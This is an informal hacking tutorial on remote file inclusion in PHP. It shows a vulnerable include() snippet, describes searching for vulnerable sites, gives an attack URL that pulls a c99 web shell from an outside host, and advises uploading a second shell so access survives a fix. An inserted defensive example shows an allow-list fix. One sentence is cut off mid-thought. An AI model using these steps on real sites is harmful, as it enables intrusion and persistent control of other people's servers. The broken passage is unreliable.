R.F.I. (Basic Tutorial)
OK, so remote file inclusion is including a file from your site on another site/server. Normally people will include a c99 shell. So then all you have to do is find a site. So let's say we have a site:
http://www.example.com/index.php?page=blog.php
OK, so to find out if it's vulnerable, go to index.php and view the source (newbies: "right click --> view page source"). If the inclusion code is something like:
Code:
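<?php
// $page is taken straight from the query string, with no validation
$page = $_GET['page'];
// include() then loads whatever path or URL the request supplied
include($page);
?>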
then it's possible to include our file on their site. Finding vuln sites is easier than ever now that Google Code Search is out:
http://www.google.com/codesearch
So let's say http://www.example.com/index.php has that code in it. Now we try this:
http://www.example.com/index.php?page=http:/...om/c99.txt
You see, this will show your c99 shell on their site. So when it had the include function for blog.php, it was including that page in that site. It's a common flaw, seeing that people use it so much because of its simplicity.
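The flaw above is that the page value goes from the request straight into include(). As an added example (not part of the original post), this is one way to close it: resolve the parameter through a fixed allow-list of local files. The page names, the pages/ directory and the resolve_page() helper are assumptions made for illustration.

```php
<?php
// Added example, not from the original post. Hardened replacement for
// include($_GET['page']). Defence in depth: keep allow_url_include = Off
// in php.ini so include() cannot fetch http:// or ftp:// URLs at all.

// Assumed layout: includable pages live in ./pages next to this script.
const PAGE_DIR = __DIR__ . '/pages';

// Only these request values are accepted; each maps to one local file.
const PAGES = [
    'blog.php'    => 'blog.php',
    'home.php'    => 'home.php',
    'contact.php' => 'contact.php',
];

// Hypothetical helper: returns an absolute path inside PAGE_DIR, or null.
function resolve_page($requested): ?string
{
    // page[]=x arrives as an array; anything not in the list is refused.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // directory or file missing
    }
    // Belt and braces: the resolved file must still sit under PAGE_DIR.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

$requested = $_GET['page'] ?? 'home.php';
$file = resolve_page($requested);

if ($file === null) {
    // Rejected values (URLs, ../ sequences) are worth alerting on.
    // json_encode() escapes control characters before the value is logged.
    error_log('rejected page parameter: ' . json_encode($requested));
    http_response_code(404);
    exit('Page not found');
}

include $file;
```

A request such as index.php?page=blog.php still works, while any value that is not a key in the list ends in the 404 branch and leaves a log line for review.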
Now this should work. But if it shows the shell in its original text form, then

But don't try a .php shell on there, because, you see, if you upload the shell to your account on, let's say, spam.com and save it as .php, when you include the shell it will show the shell on your site. So you will just be defacing your t35 account from a different site. So it has to be in .txt form.

If it shows the shell, I recommend uploading a shell from the included shell, because it makes it much easier to manage. Also, you can go back to the shell if they fix the bugs.
Happy Hacking